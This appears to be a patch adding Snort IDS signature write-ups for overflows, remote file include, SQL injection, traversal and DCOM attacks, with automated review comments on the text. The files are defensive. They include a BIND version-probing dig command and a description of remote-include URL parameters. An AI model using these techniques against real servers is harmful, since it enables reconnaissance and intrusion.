+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
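Review bot: `NOOP instrucions` in Detailed Information should be `instructions`, and `Denial of Service (DoS) possible execution of arbitrary code` in Impact needs a separator (`DoS, possible execution ...`). Attack Scenarios names a specific overflow in the Microsoft Workstation service logging function, yet Additional References is empty; add the vendor bulletin and CVE for that bug, or drop the specific scenario from what is otherwise a generic shellcode rule. Since Detailed Information says the shellcode `may also use Unicode encoding`, False Positives should mention that legitimate UTF-16 text and other wide-character payloads can contain the same byte patterns, not only `binary file transfers`.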
--- /dev/null
+++ b/doc/signatures/416.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+416
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Reply datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Information Reply datagrams contain the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+Undefined ICMP Code values should never been seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Detailed Information:
+This message is generated in response to an ICMP Information Request Message.  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 16 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
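Review bot: `should never been seen on the network` in Impact should read `should never be seen`, and `the network number of subnet it is on` in Detailed Information is missing `the`. Attack Scenarios says `None known` while Impact calls the traffic a possible `indication of nefarious activity` and Ease of Attack says `Numerous tools and scripts can generate this type of ICMP datagram`; reconcile these, for example by stating that an undefined code on a Type 16 reply is most likely a hand-crafted packet from a packet-crafting tool rather than a misconfigured host. Also the `--` after `False Negatives: None known` lacks the blank line used before every other separator in this file.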
--- /dev/null
+++ b/doc/signatures/2795.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2795
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
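Review bot: the procedure name in Detailed Information is split with the period starting a new line (`vulnerability in the procedure refresh_snapshot_repgroup` / `. This procedure is included in` / `dbms_repcat.`), which looks like a template substitution that was never rejoined; make it one sentence. `Oracle Oracle9i` in Affected Systems repeats the vendor name. Corrective Action says `Apply the appropriate vendor supplied patch` but Additional References is empty, so the reader cannot identify which patch; add the Oracle alert covering the dbms_repcat overflows.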
--- /dev/null
+++ b/doc/signatures/2597.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2597
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in the Samba Web Administration Tool (SWAT).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in SWAT that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in the functions that handle base64 decoding
+during HTTP basic authentication. Exploitation of this vulnerability
+may present the attacker with the opportunity to gain control of the
+affected system.
+
+--
+Affected Systems:
+	 Versions of Samba greater than or equal to 3.0.2 and
+     less than 3.0.5
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the SWAT
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600
+
+Bugtraq:
+http://www.securityfocus.com/bid/10780
+
+--
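Review bot: `An attcker needs` in Attack Scenarios should be `attacker`. The Affected Systems entry mixes a tab on the first line with spaces on the continuation (`Versions of Samba greater than or equal to 3.0.2 and` / `less than 3.0.5`); indent both lines the same way as the other docs. Detailed Information places the overflow in `the functions that handle base64 decoding during HTTP basic authentication`; it is worth saying explicitly that the bug is hit while decoding the supplied credentials, i.e. before any authentication succeeds, because that is what justifies the `Remote execution of arbitrary code` Impact without a valid account.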
--- /dev/null
+++ b/doc/signatures/2678.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2678
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure start_log
+. This procedure is included in
+ctx_output.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
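Review bot: same unjoined template text as in 2795.txt: `vulnerability in the procedure start_log` / `. This procedure is included in` / `ctx_output.` should be a single sentence, and `Oracle Oracle9i` duplicates the vendor name. Additional References is empty here too; since the two docs are otherwise identical, point both at the same Oracle alert and mention in the Summary which package (ctx_output here, dbms_repcat in 2795) distinguishes this rule, so an analyst seeing both alerts can tell them apart.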
--- /dev/null
+++ b/doc/signatures/1598.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1598
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
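Review bot: Affected Systems is empty, and the rest of the text never says which server or protocol this rule inspects: Summary and Detailed Information talk about `web, web applications and ftp servers`, while Attack Scenarios is specific to `folders outside the ftp root directory`. Name the product or protocol the rule is written for and fill in Affected Systems accordingly; as written the doc is indistinguishable from 1488.txt in this same patch, and Additional References is empty as well.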
--- /dev/null
+++ b/doc/signatures/119-2.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid: 
+119-2
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when double encoded characters are detected in
+web traffic. This is abnormal behavior and may be an indicator of a
+possible attack against a vulnerable system.
+
+This may also be an attempt to evade IDS.
+
+--
+Affected Systems:
+	Microsoft IIS Servers.
+
+--
+Attack Scenarios: 
+An attacker might double encode the request to the web server, this may
+then evade an IDS monitoring traffic and could then launch a successful
+attack without being detected.
+
+-- 
+Ease of Attack: 
+Simple. Exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software
+
+Use Apache.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
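Review bot: `Use Apache.` under Corrective Action is not a remediation for a preprocessor alert on double-encoded URIs; double encoding is a client-side evasion (the attacker encodes `%` as `%25` so the payload survives one round of decoding), and any server that decodes a URI twice is affected, so drop the line or replace it with advice to verify how the target server decodes URIs. For the same reason Affected Systems should not be limited to `Microsoft IIS Servers`, and `Simple. Exploits exist.` under Ease of Attack is misleading: no exploit is needed to double-encode a request.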
--- /dev/null
+++ b/doc/signatures/922.txt
@@ -0,0 +1,62 @@
+SID:
+922
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
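Review bot: this file puts `SID:` before `Rule:` and ends with `References:` instead of `Additional References:`, unlike every other doc in the patch; reorder and rename so tooling that parses these sections by heading still works. Typos: `This even indicates` (event), `This data can be accesses` (accessed), `at type of writing` (time of writing). Ease of Attack correctly notes that attackers `need the ability to add files to the server`, but the Summary and Impact do not mention that precondition; adding it to the Summary keeps the severity in context.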
--- /dev/null
+++ b/doc/signatures/100000466.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000466
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Free QBoard" application running on a webserver. 
+Access to the file "post.php" using a remote file being passed as the "qb_path" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "qb_path" parameter in the "post.php" script used by the 
+"Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
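Review bot: the third Detailed Information paragraph and the Attack Scenarios text are generic credential-bypass boilerplate (`An attacker can access an authentication mechanism and supply his/her own credentials`) that do not describe a remote file include; for this rule the scenario is an attacker supplying a URL to attacker-hosted PHP code in the `qb_path` parameter of `post.php`, which the server then includes and executes. Replace the boilerplate with that, and fix `running ona web server`. Corrective Action could also mention disabling `allow_url_include` and `allow_url_fopen` in php.ini, the standard mitigation for this class of bug.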
--- /dev/null
+++ b/doc/signatures/100000535.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000535
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "IMGallery" application running on a webserver. Access to 
+the file "galeria.php" with SQL commands being passed as the "start" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "start" parameter in the "galeria.php" script used by 
+the "IMGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IMGallery
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
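Review bot: the third Detailed Information paragraph (`Some applications do not perform stringent checks when validating the credentials of a client host`) is the same authentication boilerplate used in the RFI docs and does not apply to SQL injection via the `start` parameter; drop it so the doc agrees with Attack Scenarios, which correctly describes unsanitised input reaching the database. Typo: `running ona web server`. If `start` is a numeric offset, Corrective Action should recommend casting it to an integer or using parameterised queries rather than only applying patches, and False Positives should say whether the rule keys on SQL keywords that could appear in legitimate values.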
--- /dev/null
+++ b/doc/signatures/2057.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2057
+
+--
+Summary:
+helpout.exe.
+
+--
+Impact:
+Denial of Service
+
+--
+Detailed Information:
+It is possible to issue a denial of service to vulnerable versions of 
+the WebSphere caching proxy by sending an illegitimate request to the 
+cgi script helpout.exe.
+
+scanner nessus to scan the server for possible exploit opportunities.
+
+--
+Affected Systems:
+WebSphere caching proxy
+
+--
+Attack Scenarios:
+The attacker merely needs to send a bad request to helpout.exe.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-vulnerable version of WebSphere caching proxy 
+or disable the script helpout.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11162
+
+--
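Review bot: the Summary is just `helpout.exe.`, and Detailed Information contains an orphan fragment `scanner nessus to scan the server for possible exploit opportunities.` whose beginning is missing; both look like lost lines. Write a full Summary (for example `This event is generated when a malformed request is made to the helpout.exe CGI script on a WebSphere caching proxy.`) and either complete or remove the Nessus sentence, since the plugin is already linked under Additional References. Affected Systems should also say which WebSphere caching proxy versions are vulnerable, as Corrective Action implies a fixed version exists.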
--- /dev/null
+++ b/doc/signatures/1488.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1488
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
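Review bot: this file is word-for-word identical to 1598.txt in this patch (same empty Affected Systems, same FTP-specific Attack Scenarios under a generic directory-traversal Summary), so a reader cannot tell what differs between sid 1488 and sid 1598. Fill in Affected Systems and say which traversal pattern or service this rule matches; if the two rules really differ only in the byte pattern, state that here.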
--- /dev/null
+++ b/doc/signatures/100000738.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000738
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "EditIP.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "EditIP.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
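Review bot: the parameter is given as `$_CONF[path]` in Summary and Detailed Information, but `$` is the PHP variable sigil, not part of the HTTP parameter name; what an attacker sends on the wire is `_CONF[path]=http://...`, and that is the string a detection rule has to match. Drop the `$` or explain it. The two leading blank lines before `Rule:` and the `running ona web server` typo should also go, and as with the other RFI docs in this patch the Attack Scenarios credential-supply text does not describe a file include.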
--- /dev/null
+++ b/doc/signatures/1476.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1476
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
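Review bot: the Summary promises `a known vulnerability in a CGI web application` but the doc never names the application, script or parameter, and Affected Systems is just `All systems running CGI applications`, which leaves an analyst with nothing to verify against. State what the rule matches and the product it targets, and add a reference. Typo: `running ona web server`; also `relationships between the victim server and other hosts can be exploited by the attacker.` is left unwrapped while the rest of the paragraph is wrapped at about 72 columns.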
--- /dev/null
+++ b/doc/signatures/2232.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2232
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
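Review bot: Detailed Information says `Versions of Trend Micro InterScan eManager suffer` without saying which, while Affected Systems lists only `3.51`; make the two agree and state whether later versions are fixed, since Corrective Action tells the reader to upgrade. The last two Corrective Action items (`Disable the web interface`, `Enable NTLM authentication for the administrative interface`) lack terminating periods, and NTLM authentication only mitigates the bug if the overflow is reached after authentication, which the text does not establish; say so or drop that item.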
--- /dev/null
+++ b/doc/signatures/3287.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3287
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
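Review bot: Attack Scenarios (`An attacker may make a request for a file with an overly long filename via a network share`) does not describe the vulnerability in Detailed Information, which is a malformed DCOM request over RPC; the sentence appears to have been copied from an unrelated rule doc. Replace it with a scenario that matches (a crafted RPC request to the DCOM interface on one of the ports listed in Corrective Action). Typo: `Expoit code exists.` Additional References is empty even though Affected Systems lists five Windows versions; add the Microsoft security bulletin and CVE so the `appropriate vendor supplied patches` can be identified.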
--- /dev/null
+++ b/doc/signatures/925.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+925
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
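Review bot: `Coldfusion` in Detailed Information versus `ColdFusion` elsewhere; pick one spelling. More importantly the doc says nothing about what this particular rule matches (`Many known vulnerabilities exist ... the attack scenarios are legion`), Affected Systems is `All systems running ColdFusion`, and Additional References is empty, so it cannot be distinguished from 922.txt or the other ColdFusion docs in this patch. Name the path or CFML tag the rule looks for and the advisory it maps to.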
--- /dev/null
+++ b/doc/signatures/1435.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1435
+
+--
+Summary:
+This event is generated when an attempt is made to query authors.bind on your DNS server.
+
+--
+Impact:
+Reconnaissance. This informs an attacker that version of BIND running is 9 or greater.
+
+--
+Detailed Information:
+Beginning with version of BIND 9, the authors of BIND created a new "feature" that would allow a user to query for the authors' names.  This feature is enabled by default allowing an attacker to query the DNS server and examine the response.  If the response returns the BIND authors' names, the attacker knows that the version of BIND running is 9 or higher.
+
+--
+Affected Systems:
+BIND versions 9.
+
+--
+Attack Scenarios:
+An attacker can execute this query to find DNS servers running BIND version 9 and higher.
+
+--
+Ease of Attack:
+Simple. Use the Unix command 'dig @ns.com authors.bind txt chaos'  
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the ability to retrieve the authors.bind chaos record by either applying the patch from ISC or by modifying the servers configuration file. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10728
+
+Arachnids:
+http://www.whitehats.com/info/IDS480
+
+--
